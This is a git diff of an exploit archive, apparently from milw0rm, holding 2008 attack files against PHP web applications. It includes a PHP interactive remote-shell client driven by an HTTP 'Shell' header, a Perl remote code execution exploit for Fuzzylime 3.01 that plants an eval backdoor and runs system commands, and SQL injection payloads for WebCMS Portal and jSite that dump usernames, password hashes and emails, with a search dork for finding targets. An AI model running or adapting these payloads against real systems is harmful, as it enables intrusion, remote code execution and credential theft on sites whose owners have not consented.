"\r\n"; - $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; - $req .= "Shell: $shell\r\n"; - $req .= "Connection: close\r\n\r\n"; - - unset($shell); - - fputs($fp, $req); - - $content = ''; - while(!feof($fp)) $content .= fgets($fp, 128); - - fclose($fp); - - # Remove headers - $data = explode("\r\n\r\n", $content); - $headers = array_shift($data); - $content = implode("\r\n\r\n", $data); - - if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) - $content = $this->unchunk($content); - - preg_match($this->regex, $content, $data); - - if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; - - return $data[1]; - } - - /** - * unchunk() - * This function aims to remove chunked content sizes which - * are putted by apache server when it uses chunked - * transfert-encoding. - */ - function unchunk($data) - { - $dsize = 1; - $offset = 0; - - while($dsize>0) - { - $hsize_size = strpos($data, "\r\n", $offset) - $offset; - - $dsize = hexdec(substr($data, $offset, $hsize_size)); - - # Remove $hsize\r\n from $data - $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); - - $offset += $dsize; - - # Remove the \r\n before the next $hsize - $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); - } - - return $data; - } -} - -?> - -# milw0rm.com [2008-07-12] +#!/usr/bin/php +') ); + +$shell = new phpreter($url.'code/polls/titles.inc.php', '-:-:-(.*)-:-:-', 'cmd', array(), false); + +function get($url) +{ + $infos = parse_url($url); + $host = $infos['host']; + $port = isset($infos['port']) ? 
$infos['port'] : 80; + + $fp = fsockopen($host, $port, &$errno, &$errstr, 30); + + $req = "GET $url HTTP/1.1\r\n"; + $req .= "Host: $host\r\n"; + $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; + $req .= "Connection: close\r\n\r\n"; + + fputs($fp,$req); + fclose($fp); +} + +/* + * Copyright (c) real + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * TITLE: PHPreter + * AUTHOR: Charles "real" F. + * VERSION: 1.0 + * LICENSE: GNU General Public License + * + * This is a really simple class with permits to exec SQL, PHP or CMD + * on a remote host using the HTTP "Shell" header. 
+ * + * + * Sample code: + * [host][sql]# mode=cmd + * [host][cmd]# id + * uid=2176(u47170584) gid=600(ftpusers) + * + * [host][cmd]# mode=php + * [host][php]# echo phpversion(); + * 4.4.8 + * [host][php]# mode=sql + * [host][sql]# SELECT version(), user() + * -------------------------------------------------- + * version() | 5.0.51a-log + * user() | dbo225004932@74.208.16.148 + * -------------------------------------------------- + * + * [host][sql]# + * + */ + +class phpreter +{ + var $url; + var $host; + var $port; + var $page; + + var $mode; + + var $ssql; + + var $prompt; + var $phost; + + var $regex; + var $data; + + /** + * __construct() + * + * @param url The url of the remote shell. + * @param regexp The regex to catch cmd result. + * @param mode Mode: php, sql or cmd. + * @param sql An array with the file to include, + * and sql vars + * @param clear Determines if clear() is called + * on startup + */ + function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) + { + $this->url = $url; + + $this->regex = '#'.$regexp.'#is'; + + # + # Set data + # + + $infos = parse_url($this->url); + $this->host = $infos['host']; + $this->port = isset($infos['port']) ? $infos['port'] : 80; + $this->page = $infos['path']; + unset($infos); + + # www.(site).com + $host_tmp = explode('.',$this->host); + $this->phost = $host_tmp[ count($host_tmp)-2 ]; + unset($host_tmp); + + # + # Set up MySQL connection string + # + if(!sizeof($sql)) + $this->ssql = ''; + elseif(sizeof($sql)==5) + { + $this->ssql = "include('$sql[0]');" + . "mysql_connect($sql[1], $sql[2], $sql[3]);" + . "mysql_select_db($sql[4]);"; + } + else + { + $this->ssql = "" + . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" + . 
"mysql_select_db('$sql[3]');"; + } + + $this->setmode($mode); + + # + # Main Loop + # + + if($clear) $this->clear(); + print $this->prompt; + + while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) + { + # change mode + if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) + $this->setmode($array[3]); + + # clear data + elseif(preg_match('#^clear$#i',$cmd)) + $this->clear(); + + # else + else print $this->exec($cmd); + + print $this->prompt; + } + } + + /** + * clear() + * Just clears ouput, printing '\n'x50 + */ + function clear() + { + print str_repeat("\n", 50); + return 0; + } + + /** + * setmode() + * Set mode (PHP, CMD, SQL) + * You don't have to call it. + * use mode=[php|cmd|sql] instead, + * in the prompt. + */ + function setmode($newmode) + { + $this->mode = strtolower($newmode); + $this->prompt = '['.$this->phost.']['.$this->mode.']# '; + + switch($this->mode) + { + case 'cmd': + $this->data = 'system(\'\');'; + break; + case 'php': + $this->data = ''; + break; + case 'sql': + $this->data = $this->ssql + . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");' + . 'print str_repeat("-",50)."\n";' + . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' + . '{' + . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' + . 'print str_repeat("-",50)."\n";' + . '}'; + break; + } + return $this->mode; + } + + /** + * exec() + * Execute any query and catch the result. + * You don't have to call it. + */ + function exec($cmd) + { + if(!strlen($this->data)) $shell = $cmd; + else $shell = str_replace('', addslashes($cmd), $this->data); + + $fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30); + + $req = "GET " . $this->page . " HTTP/1.1\r\n"; + $req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . 
"\r\n"; + $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; + $req .= "Shell: $shell\r\n"; + $req .= "Connection: close\r\n\r\n"; + + unset($shell); + + fputs($fp, $req); + + $content = ''; + while(!feof($fp)) $content .= fgets($fp, 128); + + fclose($fp); + + # Remove headers + $data = explode("\r\n\r\n", $content); + $headers = array_shift($data); + $content = implode("\r\n\r\n", $data); + + if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) + $content = $this->unchunk($content); + + preg_match($this->regex, $content, $data); + + if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; + + return $data[1]; + } + + /** + * unchunk() + * This function aims to remove chunked content sizes which + * are putted by apache server when it uses chunked + * transfert-encoding. + */ + function unchunk($data) + { + $dsize = 1; + $offset = 0; + + while($dsize>0) + { + $hsize_size = strpos($data, "\r\n", $offset) - $offset; + + $dsize = hexdec(substr($data, $offset, $hsize_size)); + + # Remove $hsize\r\n from $data + $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); + + $offset += $dsize; + + # Remove the \r\n before the next $hsize + $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); + } + + return $data; + } +} + +?> + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6054.pl b/platforms/php/webapps/6054.pl index d41d8e68c..323a4a6b5 100755 --- a/platforms/php/webapps/6054.pl +++ b/platforms/php/webapps/6054.pl 
@@ -1,383 +1,383 @@ -#!/usr/bin/perl -#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!! -#after i noticed that there was a problem changing $cmd,i fixed it.this is the result. -## -## Fuzzylime 3.01 Remote Code Execution -## Credits: real and inphex -## -## [C:\]# perl ye.pl host /path/ -## :>id -## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data) -## - -use LWP::UserAgent; -use HTTP::Cookies; -use Switch; - - -$host_ = "http://".shift; -$path_ = shift; -$info{'info'} = { - "description" => ["#################################################\nFuzzyLime Remote Code Execution\n#################################################\nreal & inphex\n"], - "options" => - { - "agent" => "", - "proxy" => "", - "default_headers" => [ - ["key","value"]], - "timeout" => 2, - "cookie" => - { - "cookie" => [""], - }, - }, - "sending_options" => - { - "host" => $host_, - "path" => $path_."code/polladd.php", - "port" => 80, - "method_a" => "REMOTE_CODE_EXECUTION", - "attack" => - { - "poll" => ["get","poll","....//swear"], - "log" => ["get","log","1"], - "_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","\";eval(\"\$_POST[cmd]\"); ?>"], - }, - }, - -}; - -&start($info{'info'},222); - -while () { - print ":>"; - $cmd = ; - chomp($cmd); - $info1{'info1'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php", "port" => 80, "method_a" => "REMOTE_CODE_EXECUTION", "attack" =>{ - "cmd" => ["post","cmd","system('".$cmd."');"],},},}; - &start($info1{'info1'},221); - print ${$info1{'info1'}}{221}{'content'}; -} - - -sub start -{ - - $a_ = shift; - $id = shift; - $post_dA = ""; - $get_dA = get_d_p_s("get"); - $post_dA = get_d_p_s("post"); - - my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); - $jj = 1; - $ii = 48; - $hh = 1; - $ppp = 0; - $s = shift; - $a = ""; - $res_p = ""; - 
$h = ""; - $ua= ""; - $agent= ""; - $k= ""; - $v= ""; - $get_data= ""; - $post_data= ""; - $header_dA = ""; - $h_host_h_xdsjaop = $a_->{'sending_options'}{'host'}; - $h_path_h_xdsjaop = $a_->{'sending_options'}{'path'}; - $h_port_h_xdsjaop = $a_->{'sending_options'}{'port'}; - $method_m = $a_->{'sending_options'}{'method_a'}; - $ua = LWP::UserAgent->new; - $ua->timeout($a_->{'options'}{'timeout'}); - if ($a_->{'options'}{'proxy'}) { - $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); - } - $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; - $ua->agent($agent); - { - while (($k,$v) = each(%{$a_})) - { - if ($k ne "options" && $k ne "sending_options") - { - foreach $r (@{$a_->{$k}}) - { - print $a_->{$k}[0]; - } - } - } - - - foreach $j (@{$a_->{'options'}{'default_headers'}}) - { - $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); - $m++; - } - - if ($a_->{'options'}{'cookie'}{'cookie'}[0]) - { - $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); - } - - - - } - switch ($method_m) - { - case "attack" { &attack();} - case "SQL_INJECTION_BLIND" { &sql_injection_blind();} - case "REMOTE_COMMAND_EXECUTION" { &attack();} - case "REMOTE_CODE_EXECUTION" {&attack();} - case "REMOTE_FILE_INCLUSION" { &attack();} - case "LOCAL_FILE_INCLUSION" { &attack(); } - else { &attack(); } - - } - - - sub attack - { - my ($jj); - my ($h); - my($x); - if ($post_dA eq "") { - $method = "get"; - } elsif ($post_dA ne "") - { - $method = "post"; - } - if ($method eq "get") { - $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA); - ${$a_}{$id}{'content'} = $res_p; - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; - - while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) - { - if (${$jj} ne "") - { - ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; - $x++; - } - $jj++; - } - 
- $h++; - } - } elsif ($method eq "post") - { - $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA); - - ${$a_}{$id}{'content'} = $res_p; - - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; - while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) - { - if (${$jj} ne "") - { - ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; - $x++; - } - $jj++; - } - $h++; - } - } - - } - sub sql_injection_blind - { - while () - { - while ($ii <= 120) - { - - $itsx = "[".chr($ii)."]"; - $l = length($itsx); - $b = ("\b")x$l; - syswrite STDOUT,$b.$itsx; - - if(check($ii,$hh) == 1) - { - syswrite STDOUT,$b.chr($ii)."---"; - $hh++; - $chr = $chr.chr($ii); - } - $ii++; - } - push(@ffs,length($chr)); - if (($#ffs - 999) == $ffs) - { - exit; - } - $ii = 48; - } - } - sub check($$) - { - my ($h); - my ($a); - $ii = shift; - $hh = shift; - - if (get_d_p_s("post") ne "") - { - $method = "post"; - } else { $method = "get";} - if ($method eq "get") - { - $ppp++; - $query = modify($get_dA,$ii,$hh); - $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query); - - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) - { - if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { - return 1; - } else { return 0;} - } - else - { - if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { - return 0; - }else { return 1;} - - - } - $h++; - } - } elsif ($method eq "post") - { - $ppp++; - $query_g = modify($get_dA,$ii,$hh); - $query_p = modify($post_dA,$ii,$hh); - - $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p); - foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) - { - if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) - { - return 1; - } - 
else - { - return 0; - } - $h++; - } - } - } - sub modify($$$) - { - $string = shift; - $replace_by = shift; - $replace_by1 = shift; - - if ($string !~/\$i/ && $string !~/\$h/) { - return $string; - } elsif ($string !~/\$i/) - { - $ff = substr($string,0,index($string,"\$h")); - $ee = substr($string,rindex($string,"\$h")+2); - $string = $ff.$replace_by1.$ee; - - return $string; - } elsif ($string !~/\$h/) - { - $f = substr($string,0,index($string,"\$i")); - $e = substr($string,rindex($string,"\$i")+2); - $string = $f.$replace_by.$e; - return $string; - } else - { - $f = substr($string,0,index($string,"\$i")); - $e = substr($string,rindex($string,"\$i")+2); - $string = $f.$replace_by.$e; - - $ff = substr($string,0,index($string,"\$h")); - $ee = substr($string,rindex($string,"\$h")+2); - $string = $ff.$replace_by1.$ee; - - return $string; - } - } - sub get_d_p_s - { - $k = 0; - $v = 0; - $g_d_p_s = shift; - - @post = (); - @get = (); - - $post_data = ""; - $get_data = ""; - $header_data = ""; - %header_dA = (); - $p = ""; - $g = ""; - while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) - { - if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/) - { - $p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; - } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) { - $g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; - } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") - { - $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; - } - } - if ($g_d_p_s eq "get") - { - return $g; - } - elsif ($g_d_p_s eq "post") - { - return $p; - } elsif ($g_d_p_s eq "header") - { - return %header_dA; - } - - @a_ = (); - } - sub get_data - { - $h_host_h_xdsjaop = shift; - $h_path_h_xdsjaop = shift; - %hash = get_d_p_s("header"); - while (($u,$c) = each(%hash)) - { - $ua->default_headers->push_header($u => $c); - } - $req = 
$ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); - return $req->content; - } - sub post_data - { - $h_host_h_xdsjaop = shift; - $h_path_h_xdsjaop = shift; - $content_type = shift; - $send = shift; - %hash = get_d_p_s("header"); - while (($u,$c) = each(%hash)) - { - $ua->default_headers->push_header($u => $c); - } - $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); - $req->content_type($content_type); - $req->content($send); - $res = $ua->request($req); - return $res->content; - } - -} - -# milw0rm.com [2008-07-12] +#!/usr/bin/perl +#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!! +#after i noticed that there was a problem changing $cmd,i fixed it.this is the result. +## +## Fuzzylime 3.01 Remote Code Execution +## Credits: real and inphex +## +## [C:\]# perl ye.pl host /path/ +## :>id +## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data) +## + +use LWP::UserAgent; +use HTTP::Cookies; +use Switch; + + +$host_ = "http://".shift; +$path_ = shift; +$info{'info'} = { + "description" => ["#################################################\nFuzzyLime Remote Code Execution\n#################################################\nreal & inphex\n"], + "options" => + { + "agent" => "", + "proxy" => "", + "default_headers" => [ + ["key","value"]], + "timeout" => 2, + "cookie" => + { + "cookie" => [""], + }, + }, + "sending_options" => + { + "host" => $host_, + "path" => $path_."code/polladd.php", + "port" => 80, + "method_a" => "REMOTE_CODE_EXECUTION", + "attack" => + { + "poll" => ["get","poll","....//swear"], + "log" => ["get","log","1"], + "_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","\";eval(\"\$_POST[cmd]\"); ?>"], + }, + }, + +}; + +&start($info{'info'},222); + +while () { + print ":>"; + $cmd = ; + chomp($cmd); + $info1{'info1'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, 
"cookie" => {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php", "port" => 80, "method_a" => "REMOTE_CODE_EXECUTION", "attack" =>{ + "cmd" => ["post","cmd","system('".$cmd."');"],},},}; + &start($info1{'info1'},221); + print ${$info1{'info1'}}{221}{'content'}; +} + + +sub start +{ + + $a_ = shift; + $id = shift; + $post_dA = ""; + $get_dA = get_d_p_s("get"); + $post_dA = get_d_p_s("post"); + + my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0); + $jj = 1; + $ii = 48; + $hh = 1; + $ppp = 0; + $s = shift; + $a = ""; + $res_p = ""; + $h = ""; + $ua= ""; + $agent= ""; + $k= ""; + $v= ""; + $get_data= ""; + $post_data= ""; + $header_dA = ""; + $h_host_h_xdsjaop = $a_->{'sending_options'}{'host'}; + $h_path_h_xdsjaop = $a_->{'sending_options'}{'path'}; + $h_port_h_xdsjaop = $a_->{'sending_options'}{'port'}; + $method_m = $a_->{'sending_options'}{'method_a'}; + $ua = LWP::UserAgent->new; + $ua->timeout($a_->{'options'}{'timeout'}); + if ($a_->{'options'}{'proxy'}) { + $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'}); + } + $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; + $ua->agent($agent); + { + while (($k,$v) = each(%{$a_})) + { + if ($k ne "options" && $k ne "sending_options") + { + foreach $r (@{$a_->{$k}}) + { + print $a_->{$k}[0]; + } + } + } + + + foreach $j (@{$a_->{'options'}{'default_headers'}}) + { + $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]); + $m++; + } + + if ($a_->{'options'}{'cookie'}{'cookie'}[0]) + { + $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]); + } + + + + } + switch ($method_m) + { + case "attack" { &attack();} + case "SQL_INJECTION_BLIND" { &sql_injection_blind();} + case "REMOTE_COMMAND_EXECUTION" { &attack();} + case "REMOTE_CODE_EXECUTION" {&attack();} + case "REMOTE_FILE_INCLUSION" { &attack();} + case "LOCAL_FILE_INCLUSION" { &attack(); } + else { 
&attack(); } + + } + + + sub attack + { + my ($jj); + my ($h); + my($x); + if ($post_dA eq "") { + $method = "get"; + } elsif ($post_dA ne "") + { + $method = "post"; + } + if ($method eq "get") { + $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA); + ${$a_}{$id}{'content'} = $res_p; + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; + + while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) + { + if (${$jj} ne "") + { + ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; + $x++; + } + $jj++; + } + + $h++; + } + } elsif ($method eq "post") + { + $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA); + + ${$a_}{$id}{'content'} = $res_p; + + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/; + while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) + { + if (${$jj} ne "") + { + ${$a_}{$id}{'regex'}[$h][$x] = ${$jj}; + $x++; + } + $jj++; + } + $h++; + } + } + + } + sub sql_injection_blind + { + while () + { + while ($ii <= 120) + { + + $itsx = "[".chr($ii)."]"; + $l = length($itsx); + $b = ("\b")x$l; + syswrite STDOUT,$b.$itsx; + + if(check($ii,$hh) == 1) + { + syswrite STDOUT,$b.chr($ii)."---"; + $hh++; + $chr = $chr.chr($ii); + } + $ii++; + } + push(@ffs,length($chr)); + if (($#ffs - 999) == $ffs) + { + exit; + } + $ii = 48; + } + } + sub check($$) + { + my ($h); + my ($a); + $ii = shift; + $hh = shift; + + if (get_d_p_s("post") ne "") + { + $method = "post"; + } else { $method = "get";} + if ($method eq "get") + { + $ppp++; + $query = modify($get_dA,$ii,$hh); + $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query); + + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) + { + if 
($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { + return 1; + } else { return 0;} + } + else + { + if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) { + return 0; + }else { return 1;} + + + } + $h++; + } + } elsif ($method eq "post") + { + $ppp++; + $query_g = modify($get_dA,$ii,$hh); + $query_p = modify($post_dA,$ii,$hh); + + $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p); + foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) + { + if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) + { + return 1; + } + else + { + return 0; + } + $h++; + } + } + } + sub modify($$$) + { + $string = shift; + $replace_by = shift; + $replace_by1 = shift; + + if ($string !~/\$i/ && $string !~/\$h/) { + return $string; + } elsif ($string !~/\$i/) + { + $ff = substr($string,0,index($string,"\$h")); + $ee = substr($string,rindex($string,"\$h")+2); + $string = $ff.$replace_by1.$ee; + + return $string; + } elsif ($string !~/\$h/) + { + $f = substr($string,0,index($string,"\$i")); + $e = substr($string,rindex($string,"\$i")+2); + $string = $f.$replace_by.$e; + return $string; + } else + { + $f = substr($string,0,index($string,"\$i")); + $e = substr($string,rindex($string,"\$i")+2); + $string = $f.$replace_by.$e; + + $ff = substr($string,0,index($string,"\$h")); + $ee = substr($string,rindex($string,"\$h")+2); + $string = $ff.$replace_by1.$ee; + + return $string; + } + } + sub get_d_p_s + { + $k = 0; + $v = 0; + $g_d_p_s = shift; + + @post = (); + @get = (); + + $post_data = ""; + $get_data = ""; + $header_data = ""; + %header_dA = (); + $p = ""; + $g = ""; + while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) + { + if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/) + { + $p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; + } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) { + $g .= 
$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&"; + } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") + { + $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2]; + } + } + if ($g_d_p_s eq "get") + { + return $g; + } + elsif ($g_d_p_s eq "post") + { + return $p; + } elsif ($g_d_p_s eq "header") + { + return %header_dA; + } + + @a_ = (); + } + sub get_data + { + $h_host_h_xdsjaop = shift; + $h_path_h_xdsjaop = shift; + %hash = get_d_p_s("header"); + while (($u,$c) = each(%hash)) + { + $ua->default_headers->push_header($u => $c); + } + $req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); + return $req->content; + } + sub post_data + { + $h_host_h_xdsjaop = shift; + $h_path_h_xdsjaop = shift; + $content_type = shift; + $send = shift; + %hash = get_d_p_s("header"); + while (($u,$c) = each(%hash)) + { + $ua->default_headers->push_header($u => $c); + } + $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop); + $req->content_type($content_type); + $req->content($send); + $res = $ua->request($req); + return $res->content; + } + +} + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6056.txt b/platforms/php/webapps/6056.txt index 44a14fcee..13285f45c 100755 --- a/platforms/php/webapps/6056.txt +++ b/platforms/php/webapps/6056.txt 
@@ -1,43 +1,43 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL InjEcti0n Vulnerability -## -## WebCMS Portal ( index.php menu ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## Name : WebCMS Portal -## -## Site : www.webcms.es -## -######################## -######################## -## -## -((:: L!VE DEMO ::))- -## -## http://www.webcms.es/demos/portal/index.php?menu=tablon&apartado=ver_anuncio&id=-43+union+select+0,0,0,concat_ws(0x3a,login,password,email),0,0,0,0,0,0,0,0+from+usuarios/* -## -######################## -######################## - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-07-12] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL InjEcti0n Vulnerability +## +## WebCMS Portal ( index.php menu ) +## +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## Name : WebCMS Portal +## +## Site : www.webcms.es +## +######################## +######################## +## +## -((:: L!VE DEMO ::))- +## +## http://www.webcms.es/demos/portal/index.php?menu=tablon&apartado=ver_anuncio&id=-43+union+select+0,0,0,concat_ws(0x3a,login,password,email),0,0,0,0,0,0,0,0+from+usuarios/* +## +######################## +######################## + +####################################################################################################### +####################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-07-12] diff --git a/platforms/php/webapps/6057.txt b/platforms/php/webapps/6057.txt index cec134aae..6222b970e 100755 
--- a/platforms/php/webapps/6057.txt
+++ b/platforms/php/webapps/6057.txt
@@ -1,52 +1,52 @@ ---==+================================================================================+==-- ---==+ jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility +==-- ---==+================================================================================+==-- - --=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=- - -AUTHOR: S.W.A.T. - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=- - -Download: http://www.sclek.com/jsite.zip - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -DORK (google): "Powered by jSite 1.0 OE" - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -DESCRIPTION: -You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;) - --=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -EXPLOITS: -www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws - -(0x3a,user,pass),admin/**/from/**/jsite_users/* - 